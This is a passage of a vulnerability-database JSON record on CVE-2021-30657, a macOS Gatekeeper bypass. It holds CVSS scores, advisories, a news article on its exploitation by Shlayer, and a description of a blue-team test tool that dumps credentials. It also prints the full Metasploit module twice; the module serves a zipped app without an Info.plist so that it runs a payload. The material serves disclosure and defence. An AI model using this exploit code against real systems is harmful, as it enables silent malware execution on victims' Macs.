"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-11-07T18:33:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Apple Mac Os X", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-09-18T08:55:09", "id": "285A3734-8E7C-544D-B792-62E544C8ECE8", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "privateArea": 1}], "prion": [{"lastseen": "2023-08-16T03:04:15", "description": "A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. 
Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-09-08T15:15:00", "type": "prion", "title": "CVE-2021-30657", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-30657", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-30657", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Apple macOS contains an unspecified logic issue in System Preferences that may allow a malicious application to bypass Gatekeeper checks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": 
"cisa_kev", "title": "Apple macOS Unspecified Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30657", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2021-04-27T16:21:46", "description": "Apple patched a zero-day vulnerability in its MacOS that can bypass critical anti-malware capabilities and which a variant of the notorious Mac threat Shlayer adware dropper already has been exploiting for several months.\n\nSecurity researcher [Cedric Owens](<https://twitter.com/cedowens>) first discovered the vulnerability, tracked as [CVE-2021\u201330657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>) and patched in macOS 11.3, [an update](<https://support.apple.com/en-us/HT212325>) dropped by Apple on Monday. The vulnerability is particularly perilous to macOS users because it allows an attacker to very easily craft a macOS payload that goes unchecked by the strict security features built into the OS specifically to keep malware out.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. 
Click above to hone your defense intelligence!\n\n\u201cThis bug trivially bypasses many core Apple security mechanisms, leaving Mac users at grave risk,\u201d warned Patrick Wardle, an Apple security expert who runs the [Objective-See](<https://objective-see.com/>) Mac security tool site, in [a blog post](<https://objective-see.com/blog/blog_0x64.html>) Monday. Owens asked Wardle to do a deeper technical dive of the bug after his initial analysis and report on it.\n\nOwens said he tested his exploit for the bug successfully on macOS Catalina 10.15\u2013specifically on 10.15.7\u2013and on versions of macOS Big Sur before Big Sur 11.3, submitting a report to Apple about the vulnerability on March 25.\n\n\u201cThis payload can be used in phishing and all the victim has to do is double-click to open the .dmg and double-click the fake app inside of the .dmg\u2013no pop ups or warnings from macOS are generated,\u201d Owens [wrote in a post](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) on his Medium blog Monday.\n\n## **Vulnerability Deep Dive**\n\nWardle\u2019s report takes an extensive technical look at the bug, finding that CVE-2021\u201330657 could bypass three key anti-malware detections present in macOS\u2014File Quarantine, Gatekeeper and Notarization, he wrote in his post.\n\nApple has always considered itself a stickler for security with a focus on locking down its proprietary hardware products against malware\u2013which makes the existence of this particular zero-day bug somewhat ironic. The three features that the flaw could bypass actually show a steady progression of macOS security, with the company reinforcing each feature to make the OS inherently less penetrable, Wardle explained.\n\nFile Quarantine, introduced in OSX Leopard (10.5) in 2007, provides the first warning to the user that requires explicit confirmation before allowing a newly downloaded file to execute, he wrote. 
However, since users kept ignoring the warning and letting malware pass through, Apple introduced Gatekeeper in OSX Lion (10.7) as a feature built atop File Quarantine. Gatekeeper checks the code-signing information of downloaded items, blocking those that do not adhere to system policies, Wardle said.\n\nNotarization is the newest security feature of the three, introduced in macOS Catalina (10.15) and aimed at once again preventing users from sabotaging themselves. The feature introduced Application Notarization to ensure that Apple has scanned and approved all software before it is allowed to run, according to the post.\n\nBy being able to bypass all of them, the zero-day bug, then, provides a triple threat that basically gives malware a free pass into the system. It does this by triggering a logic bug in macOS\u2019 underlying code that mischaracterizes certain application bundles and skips the usual security checks, Wardle explained.\n\nThe key to how the bug works lies in the way macOS apps identify files, which is not as single entities but instead as bundles of different files. These bundles include a list of properties that tell the app where specific files it needs to use are located.\n\nBy taking out the property file and creating a bundle in a certain way, threat actors can exploit the flaw to be misrecognized by the OS and thus pass through the security checks, Wardle said in his post.\n\n\u201cAny script-based application that does _not_ contain an Info.plist file will be misclassified as \u2018not a bundle\u2019 and thus will be allowed to execute with no alerts nor prompts,\u201d he wrote.\n\n## **Exploitation in the Wild**\n\nOnce he identified how the bug works, Wardle asked researchers from Mac security company Jamf to see if anyone had already exploited it in the wild. Turns out, a variant of malware already quite familiar to Mac users has been abusing the vulnerability since at least Jan. 
9., according to a [post Monday](<https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/>) on the Jamf Blog.\n\n\u201cThe Jamf Protect detections team observed this exploit being used in the wild by a variant of the Shlayer adware dropper,\u201d according to the post by Jamf detections lead [Jaron Bradley](<https://twitter.com/jbradley89>), who added that it is nearly identical to a malware sample previously identified by [Intego Security](<https://www.intego.com/mac-security-blog/new-mac-malware-reveals-google-searches-can-be-unsafe/>).\n\nThe major difference, however, is that the variant has been repackaged to use a format necessary for carrying out the MacOS Gatekeeper bypass vulnerability, he explained, going into detail about how the attacker abused the flaw.\n\nShlayer and the macOS already have quite a history, as the [stealthy adware](<https://threatpost.com/shlayer-mac-malware-extra-sneakiness/156669/>) is known as the [No. 1 threat to Macs](<https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/>). 
Indeed, Shlayer was found [slipping through the Notarization](<https://threatpost.com/apple-accidentally-notarizes-shlayer-malware/158818/>) feature as recently as last August disguised as Adobe Flash Player updates, something Wardle co-discovered with researcher [Peter Dantini](<https://twitter.com/PokeCaptain>) at the time.\n\nUnderstandably, Apple and all the security researchers who took a look at the zero-day vulnerability are advising that macOS users update their systems immediately to avoid falling victim to any existing exploits for it.\n
", "cvss3": {}, "published": "2021-04-27T11:45:01", "type": "threatpost", "title": "Apple Patches Zero-Day MacOS Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30657"], "modified": "2021-04-27T11:45:01", "id": "THREATPOST:7C630642BA0CC259B4DF61820DA05235", "href": "https://threatpost.com/apple-patches-macos-bug-bypass-defenses/165611/", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-10-13T22:35:55", "description": "A vulnerability exists in Apple macOS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-09-18T00:00:00", "type": "checkpoint_advisories", "title": "Apple MacOS Authentication Bypass (CVE-2021-30657)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-09-18T00:00:00", "id": "CPAI-2021-1277", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "kitploit": [{"lastseen": "2023-05-27T15:15:30", "description": 
"[](<https://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png>)\n\n \n\n\nUnit tests for [blue teams](<https://www.kitploit.com/search/label/Blue%20Teams> \"blue teams\" ) to aid with building detections for some common macOS [post exploitation](<https://www.kitploit.com/search/label/Post%20Exploitation> \"post exploitation\" ) methods. I have included some post [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) examples using both [command line](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) [history](<https://www.kitploit.com/search/label/History> \"history\" ) and on disk binaries (which should be easier for detection) as well as post exploitation examples using API calls only (which will be more difficult for detection). The post exploitation examples included here are not all encompassing. Instead these are just some common examples that I thought w ould be useful to conduct unit tests around. 
I plan to continue to add to this project over time with additional unit tests.\n\nAll of these tests run locally and return results to stdout (i.e., Swift-Attack does not connect to a server).\n\n \n\n\n**Steps:** \n\n\n> git clone <https://github.com/cedowens/Swift-Attack>\n\n * Ensure you have installed swift and developer tools (can install from the mac app store)\n\n * open the xcodeproj file in XCode\n\n * Build in XCode\n\n * The compiled app will be dropped to something like: _**Users//Library/Developer/Xcode/DerivedData/Swift-Attack-[random]/Build/Products/Debug/Swift-Attack.app**_\n\n * cd to the directory above\n\n * cd Swift-Attack.app/Contents/MacOS (you can run the macho from here or copy it elsewhere and run...up to you)\n\n * grant the Swift-Attack macho full disk access to ensure you can run all of the tests without TCC issues\n\n * run the following to remove any quarantine attributes:\n\n> xattr -c Swift-Attack\n\n * Run Swift-Attack:\n\n> ./Swift-Attack -h\n\n[](<https://github.com/cedowens/Swift-Attack/blob/main/swiftattack.png> \"Unit tests for blue teams to aid with building detections for some common macOS post exploitation methods. \\(7\\)\" )[](<https://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png>)\n\n \n**Usage:** \n\n\nYou can run Swift-Attack with a single option or multiple options\n\n> ./Swift-Attack [option1] [option2]...\n\n * I also included a simple macro.txt file (unobfuscated) for testing parent-child relationships around office macro executions on macOS. I did not obfuscate it since the focus is on parent-child relationship visibility/detection. 
If you want to test with an obfuscated macro, I have a repo at github.com/cedowens/MacC2 that contains an obfuscated macro.\n\n * I also did not include any persistence items, since in my opinion it is best to just clone and test persistence using Leo Pitt's persistent JXA repo <https://github.com/D00MFist/PersistentJXA>. This repo is by far the most comprehensive and current repo that I know of for macOS persistence.\n\n * I recently ported some of the PersistentJXA repos over to Swift: <https://github.com/cedowens/Persistent-Swift>\n\n \n**Unit Tests Included:** \n\n\n * Prompt using osascript binary\n\n * Prompt via API calls\n\n * Clipboard dump using osascript binary\n\n * Clipboard dump using API calls\n\n * Screenshot using screencapture binary\n\n * Screenshot using API calls\n\n * Shell commands\n\n * Dumping zsh history\n\n * Security tool enumeration\n\n * Grabbing system info using osascript binary\n\n * Grabbing system info via API calls\n\n * Dumping ssh, aws, gcp, and azure keys on disk\n\n * Dumping browser history (Chrome, Safari, Firefox)\n\n * Dumping Quarantine history\n\n * Office Macro: I included a simple office macro that connects to local host. Note: the macro will invoke curl to make a GET request using python to <http://127.0.0.1/testing> when executed by clicking the \"Enable Macros\" button. This will allow you to test detections for parent-child relationships around macro execution. Note: this simple test does not include any obfuscation, since the test is really more geared towards parent-child relationships. You can use another repo of mine at <https://github.com/cedowens/MacC2> to test with obfuscated macros. To use, just simply paste the contents of \"macro.txt\" into an office Doc, save as a macro enabled document or as 97-2004 document format (ex: .doc, .xls, etc.), and click \"Enable Macros\" when opening the doc to execute. 
\n\n * Installer Package: I included TestInstaller.pkg file to test for detections around a basic installer package. This installer package includes a preinstall script which runs in bash and drops com.simple.agent.plist to /Library/LaunchDaemons/ and drops test.js (simple popup prompt) to /Library/Application Support/. The com.simple.agent.plist file simply runs osascript against /Library/Application Support/test.js. It also includes a postinstall script which runs in bash and loads the com.simple.agent.plis using launchctl load. While holding the Control button click Open on TestInstaller.pkg to run it. TestInstaller.pkg will drop the aforementioned files as root.\n\n * CVE-2021-30657 Bypass Payloads: Two sample payloads (both make curl requests to localhost when detonated) to test two different types of payloads that abuse cve-2021-30657. More info here: <https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>\n\n \n \n\n\n**[Download Swift-Attack](<https://github.com/cedowens/Swift-Attack> \"Download Swift-Attack\" )**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-06-22T12:30:00", "type": "kitploit", "title": "Swift-Attack - Unit Tests For Blue Teams To Aid With Building Detections For Some Common macOS Post Exploitation Methods", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", 
"baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-06-22T12:30:00", "id": "KITPLOIT:8409423888936671546", "href": "http://www.kitploit.com/2021/06/swift-attack-unit-tests-for-blue-teams.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2023-05-27T14:46:45", "description": "This Metasploit module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS versions prior to 11.3. If the user visits the site on Safari, the zip file is automatically extracted, and clicking on the downloaded file will automatically launch the payload. If the user visits the site in another browser, the user must click once to unzip the app, and click again in order to execute the payload.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-05-08T00:00:00", "type": "zdt", "title": "macOS Gatekeeper Check Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-05-08T00:00:00", "id": "1337DAY-ID-36216", "href": "https://0day.today/exploit/description/36216", "sourceData": "#\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS Gatekeeper check bypass',\n 'Description' => %q{\n This module serves an OSX app (as a zip) that contains no Info.plist, which\n bypasses gatekeeper in macOS < 11.3.\n If the user visits the site on Safari, the zip file is automatically extracted,\n and clicking on the downloaded file will automatically launch the payload.\n If the user visits the site in another browser, the user must click once to unzip\n the app, and click again in order to execute the payload.\n },\n 'License' => MSF_LICENSE,\n 'Targets' => [\n [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-03-25',\n 'Author' => [\n 'Cedric Owens', # Discovery\n 'timwr' # Module\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2021-30657'],\n ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],\n ['URL', 'https://objective-see.com/blog/blog_0x64.html'],\n ]\n )\n )\n register_options([\n OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app'])\n ])\n end\n\n def check_useragent(user_agent)\n return false unless user_agent 
=~ /Intel Mac OS X (.*?)\\)/\n\n osx_version = Regexp.last_match(1).gsub('_', '.')\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('11.3')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.15.6')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n else\n print_good \"macOS version #{mac_osx_version} is vulnerable\"\n return true\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request #{request.uri} from #{user_agent}\")\n unless check_useragent(user_agent)\n print_error 'Unexpected User-Agent'\n send_not_found(cli)\n return\n end\n\n app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)\n send_response(cli, app_zip(app_name), { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_name}.zip\\\"\" })\n end\n\n def app_zip(app_name)\n case target['Arch']\n when ARCH_X64\n payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})\n command = \"echo \\\"#{payload_data}\\\" | python & disown\"\n when ARCH_PYTHON\n command = \"echo \\\"#{payload.encoded}\\\" | python\"\n when ARCH_CMD\n command = payload.encoded\n end\n\n shell_script = <<~SCRIPT\n #!/bin/sh\n\n #{command}\n SCRIPT\n\n zip = Rex::Zip::Archive.new\n zip.add_file(\"#{app_name}.app/\", '')\n zip.add_file(\"#{app_name}.app/Contents/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777\n zip.pack\n end\nend\n", "sourceHref": "https://0day.today/exploit/36216", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-05-07T16:10:46", "description": "", "cvss3": {}, "published": "2021-05-07T00:00:00", "type": "packetstorm", "title": "macOS Gatekeeper Check Bypass", 
"bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-30657"], "modified": "2021-05-07T00:00:00", "id": "PACKETSTORM:162504", "href": "https://packetstormsecurity.com/files/162504/macOS-Gatekeeper-Check-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'macOS Gatekeeper check bypass', \n'Description' => %q{ \nThis module serves an OSX app (as a zip) that contains no Info.plist, which \nbypasses gatekeeper in macOS < 11.3. \nIf the user visits the site on Safari, the zip file is automatically extracted, \nand clicking on the downloaded file will automatically launch the payload. \nIf the user visits the site in another browser, the user must click once to unzip \nthe app, and click again in order to execute the payload. 
\n}, \n'License' => MSF_LICENSE, \n'Targets' => [ \n[ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ], \n[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], \n[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-03-25', \n'Author' => [ \n'Cedric Owens', # Discovery \n'timwr' # Module \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ] \n}, \n'References' => [ \n['CVE', '2021-30657'], \n['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'], \n['URL', 'https://objective-see.com/blog/blog_0x64.html'], \n] \n) \n) \nregister_options([ \nOptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']) \n]) \nend \n \ndef check_useragent(user_agent) \nreturn false unless user_agent =~ /Intel Mac OS X (.*?)\\)/ \n \nosx_version = Regexp.last_match(1).gsub('_', '.') \nmac_osx_version = Rex::Version.new(osx_version) \nif mac_osx_version >= Rex::Version.new('11.3') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif mac_osx_version < Rex::Version.new('10.15.6') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelse \nprint_good \"macOS version #{mac_osx_version} is vulnerable\" \nreturn true \nend \nreturn false \nend \n \ndef on_request_uri(cli, request) \nuser_agent = request['User-Agent'] \nprint_status(\"Request #{request.uri} from #{user_agent}\") \nunless check_useragent(user_agent) \nprint_error 'Unexpected User-Agent' \nsend_not_found(cli) \nreturn \nend \n \napp_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5) \nsend_response(cli, app_zip(app_name), { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_name}.zip\\\"\" }) \nend \n \ndef app_zip(app_name) \ncase target['Arch'] \nwhen 
ARCH_X64 \npayload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {}) \ncommand = \"echo \\\"#{payload_data}\\\" | python & disown\" \nwhen ARCH_PYTHON \ncommand = \"echo \\\"#{payload.encoded}\\\" | python\" \nwhen ARCH_CMD \ncommand = payload.encoded \nend \n \nshell_script = <<~SCRIPT \n#!/bin/sh \n \n#{command} \nSCRIPT \n \nzip = Rex::Zip::Archive.new \nzip.add_file(\"#{app_name}.app/\", '') \nzip.add_file(\"#{app_name}.app/Contents/\", '') \nzip.add_file(\"#{app_name}.app/Contents/MacOS/\", '') \nzip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777 \nzip.pack \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/162504/osx_gatekeeper_bypass.rb.txt"}], "cve": [{"lastseen": "2023-05-27T14:40:46", "description": "A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. 
Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-09-08T15:15:00", "type": "cve", "title": "CVE-2021-30657", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:mac_os_x:10.15.5", "cpe:/o:apple:mac_os_x:10.15.6"], "id": "CVE-2021-30657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30657", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.6:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.6:supplemental_update:*:*:*:*:*:*", 
